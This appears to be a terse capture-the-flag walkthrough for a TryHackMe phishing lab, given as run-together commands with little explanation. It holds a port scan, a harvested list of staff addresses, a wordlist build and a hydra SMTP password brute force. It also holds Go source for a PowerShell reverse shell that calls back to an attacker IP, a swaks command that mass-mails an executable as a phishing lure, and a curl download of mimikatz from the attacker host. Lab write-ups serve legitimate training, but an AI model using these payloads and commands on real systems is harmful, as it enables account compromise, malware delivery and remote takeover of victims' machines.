You Got Mail
Test your recon and phishing skills in order to complete your objective. - by tryhackme
Last updated
nmap -sC -sV -p 25,110,135,139,143,445,587,3389,5985,47001,49664-49669,49671,49673 ygm.thm -T4 https://brownbrick.co/oaurelius@brownbrick.co
tchikondi@brownbrick.co
wrohit@brownbrick.co
pcathrine@brownbrick.co
lhedvig@brownbrick.co
fstamatis@brownbrick.cocewl --lowercase https://brownbrick.co/ > passwords.txthydra -L emails.txt -P passwords.txt ygm.thm smtp -Ipackage main
import (
"net"
"os/exec"
)
func main() {
c, _ := net.Dial("tcp", "10.14.90.235:4445")
cmd := exec.Command("powershell")
cmd.Stdin = c
cmd.Stdout = c
cmd.Stderr = c
cmd.Run()
}xargs -I {} swaks --to "{}" --from "lhedvig@brownbrick.co" --header "Subject: kickoff documents" \
--body "see attached file" --attach-type application/octet-stream --attach @0xb0b.exe \
--server ygm.thm --port 25 --timeout 20s --auth LOGIN \
--auth-user lhedvig@brownbrick.co --auth-password REDACTED < emails.txt
Get-MpComputerStatuscurl http://10.14.90.235/mimikatz.exe -o mimikatz.exe